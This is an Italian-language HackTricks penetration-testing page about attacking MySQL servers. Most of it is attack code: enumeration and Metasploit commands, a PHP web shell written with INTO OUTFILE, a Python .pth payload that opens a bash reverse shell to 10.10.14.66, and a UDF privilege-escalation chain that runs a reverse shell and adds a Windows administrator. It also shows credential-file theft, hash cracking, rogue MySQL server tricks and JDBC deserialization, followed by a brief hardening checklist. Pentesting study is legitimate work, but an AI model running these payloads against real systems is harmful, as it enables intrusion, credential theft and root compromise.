3306 - Pentesting Mysql

Reading time: 18 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

Informazioni di base

MySQL può essere descritto come un sistema di gestione di database relazionale (RDBMS) open source disponibile gratuitamente. Opera tramite il Structured Query Language (SQL), consentendo la gestione e la manipolazione dei database.

Porta predefinita: 3306

3306/tcp open  mysql

Connessione

Locale

bash

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remoto

bash

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

External Enumeration

Alcune delle azioni di enumeration richiedono credenziali valide.

bash

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Scrivere qualsiasi dato binario

bash

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Comandi MySQL

bash

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

bash

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Enumerazione dei permessi MySQL

sql

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Puoi vedere nei documenti il significato di ogni privilegio: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python `.pth` RCE (site-specific configuration hooks)

Abusando della classica primitiva INTO OUTFILE è possibile ottenere arbitrary code execution su target che in seguito eseguono script Python.

Usa INTO OUTFILE per scrivere un file personalizzato .pth in qualsiasi directory caricata automaticamente da site.py (es. .../lib/python3.10/site-packages/).
Il file .pth può contenere una singola riga che inizia con import seguita da codice Python arbitrario che verrà eseguito ogni volta che l'interprete viene avviato.
Quando l'interprete viene eseguito implicitamente da uno script CGI (per esempio /cgi-bin/ml-draw.py con shebang #!/bin/python) il payload viene eseguito con gli stessi privilegi del processo del web-server (FortiWeb lo eseguiva come root → full pre-auth RCE).

Esempio di payload .pth (singola riga, non possono essere inclusi spazi nel payload SQL finale, quindi potrebbero essere necessari hex/UNHEX() o concatenazione di stringhe):

python

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Esempio di creazione del file tramite una query UNION (i caratteri di spazio sostituiti con /**/ per bypassare un filtro di spazi sscanf("%128s") e mantenere la lunghezza totale ≤128 bytes):

sql

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Limitazioni importanti e bypass:

INTO OUTFILE non può sovrascrivere file esistenti; scegliere un nuovo nome di file.
Il percorso del file viene risolto relativo alla CWD di MySQL, quindi prefissare con ../../ aiuta ad abbreviare il percorso e a bypassare le restrizioni sui percorsi assoluti.
Se l'input dell'attaccante viene estratto con %128s (o simile) qualsiasi spazio troncherà il payload; usare le sequenze di commento MySQL /**/ o /*!*/ per sostituire gli spazi.
L'utente MySQL che esegue la query necessita del privilegio FILE, ma in molti appliance (es. FortiWeb) il servizio gira come root, conferendo accesso in scrittura quasi ovunque.

Dopo aver scritto il .pth, basta richiedere qualsiasi CGI gestito dall'interprete python per ottenere l'esecuzione di codice:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Il processo Python importerà automaticamente il file .pth maligno ed eseguirà lo shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL: lettura arbitraria di file tramite il client

In realtà, quando provi a load data local into a table il contenuto di un file, il server MySQL o MariaDB chiede al client di leggerlo e inviare il contenuto. Quindi, se puoi manomettere un mysql client per connettersi al tuo server MySQL, puoi leggere file arbitrari.
Nota che questo è il comportamento usando:

bash

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Nota la parola "local")
Perché senza "local" puoi ottenere:

bash

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

PoC iniziale: https://github.com/allyshka/Rogue-MySql-Server
In questo paper puoi vedere una descrizione completa dell'attacco e anche come estenderlo a RCE: https://paper.seebug.org/1113/
Qui puoi trovare una panoramica dell'attacco: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

POST

Utente Mysql

Sarebbe molto interessante se mysql fosse eseguito come root:

bash

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Impostazioni pericolose di mysqld.cnf

Nella configurazione dei servizi MySQL, varie impostazioni vengono utilizzate per definire il suo funzionamento e le misure di sicurezza:

L'impostazione user viene utilizzata per designare l'utente sotto cui il servizio MySQL verrà eseguito.
password è usata per stabilire la password associata all'utente MySQL.
admin_address specifica l'indirizzo IP che ascolta per connessioni TCP/IP sull'interfaccia di rete amministrativa.
La variabile debug indica le configurazioni di debug attuali, inclusa la presenza di informazioni sensibili nei log.
sql_warnings gestisce se vengono generate stringhe informative per le istruzioni INSERT di singola riga quando emergono warning, che possono contenere dati sensibili nei log.
Con secure_file_priv, l'ambito delle operazioni di importazione ed esportazione dei dati è vincolato per aumentare la sicurezza.

Escalation dei privilegi

bash

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Escalation dei privilegi tramite libreria

Se il mysql server è in esecuzione come root (o come un altro utente con privilegi più elevati) puoi farlo eseguire comandi. Per questo, devi usare le user defined functions. E per creare una user defined avrai bisogno di una libreria per il sistema operativo che esegue mysql.

La libreria malevola da usare può essere trovata all'interno di sqlmap e di metasploit eseguendo locate "*lib_mysqludf_sys*". I file .so sono librerie linux e i .dll sono quelli di Windows, scegli quella che ti serve.

Se non hai quelle librerie, puoi oppure cercarle, oppure scaricare questo linux C code e compilarlo sulla macchina linux vulnerabile:

bash

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Ora che hai la libreria, fai login in Mysql come utente privilegiato (root?) e segui i passi seguenti:

Linux

sql

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

sql

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Windows tip: creare directory con NTFS ADS da SQL

Su NTFS puoi forzare la creazione di directory usando un alternate data stream anche quando è disponibile soltanto una primitiva di scrittura su file. Se la classica UDF chain si aspetta una directory plugin ma questa non esiste e @@plugin_dir è sconosciuta o bloccata, puoi crearla prima con ::$INDEX_ALLOCATION:

sql

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Questo trasforma il limitato SELECT ... INTO OUTFILE in una primitiva più completa su stack Windows creando la struttura di cartelle necessaria per il drop delle UDF.

Estrazione delle credenziali MySQL da file

All'interno di /etc/mysql/debian.cnf puoi trovare la password in chiaro dell'utente debian-sys-maint

bash

cat /etc/mysql/debian.cnf

Puoi usare queste credenziali per effettuare il login nel database mysql.

All'interno del file: /var/lib/mysql/mysql/user.MYD puoi trovare tutti gli hash degli utenti MySQL (quelli che puoi estrarre da mysql.user all'interno del database).

Puoi estrarli eseguendo:

bash

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Abilitare il logging

È possibile abilitare la registrazione delle query di mysql nel file /etc/mysql/my.cnf rimuovendo il commento dalle seguenti righe:

File utili

File di configurazione

windows *
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Cronologia comandi
~/.mysql.history
File di log
connections.log
update.log
common.log

Database/Tabelle MySQL predefinite

ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS

Comandi automatici HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023-2025 Punti salienti (nuovo)

JDBC `propertiesTransform` deserialization (CVE-2023-21971)

Da Connector/J <= 8.0.32 un attacker che può influenzare la JDBC URL (ad esempio in software di terze parti che richiede una stringa di connessione) può richiedere il caricamento di classi arbitrarie sul lato client tramite il parametro propertiesTransform. Se un gadget presente sul class-path è caricabile, ciò comporta remote code execution in the context of the JDBC client (pre-auth, perché non sono richieste credenziali valide). Un PoC minimo è il seguente:

java

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Eseguire Evil.class può essere semplice come posizionarlo nel class-path dell'applicazione vulnerabile o permettere a un rogue MySQL server di inviare un oggetto serializzato malevolo. Il problema è stato risolto in Connector/J 8.0.33 – aggiorna il driver o imposta esplicitamente propertiesTransform in una allow-list. (Vedi il write-up di Snyk per i dettagli)

Attacchi da Rogue / Fake MySQL server contro client JDBC

Diversi strumenti open-source implementano un protocollo parziale MySQL per attaccare client JDBC che effettuano connessioni in uscita:

mysql-fake-server (Java, supporta lettura di file e exploit di deserializzazione)
rogue_mysql_server (Python, capacità simili)

Percorsi d'attacco tipici:

L'applicazione vittima carica mysql-connector-j con allowLoadLocalInfile=true o autoDeserialize=true.
L'attaccante controlla DNS / voci host in modo che il nome host del DB risolva in una macchina sotto il loro controllo.
Il server malevolo risponde con pacchetti appositamente costruiti che attivano o la lettura arbitraria di file via LOCAL INFILE o la deserializzazione Java → RCE.

Esempio di one-liner per avviare un fake server (Java):

bash

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Quindi punta l'applicazione vittima a jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true e leggi /etc/passwd codificando il nome del file in base64 nel campo username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking `caching_sha2_password` hashes

MySQL ≥ 8.0 memorizza gli hash delle password come $mysql-sha2$ (SHA-256). Sia Hashcat (mode 21100) sia John-the-Ripper (--format=mysql-sha2) supportano il cracking offline dal 2023. Effettua il dump della colonna authentication_string e fornisci direttamente il contenuto:

bash

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Checklist di hardening (2025)

• Impostare LOCAL_INFILE=0 e --secure-file-priv=/var/empty per neutralizzare la maggior parte delle primitive di lettura/scrittura di file. • Rimuovere il privilegio FILE dagli account applicativi. • Su Connector/J impostare allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (vuoto). • Disabilitare i plugin di autenticazione non utilizzati e richiedere TLS (require_secure_transport = ON). • Monitorare la presenza di CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL e improvvise istruzioni SET GLOBAL.

Riferimenti

tip

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.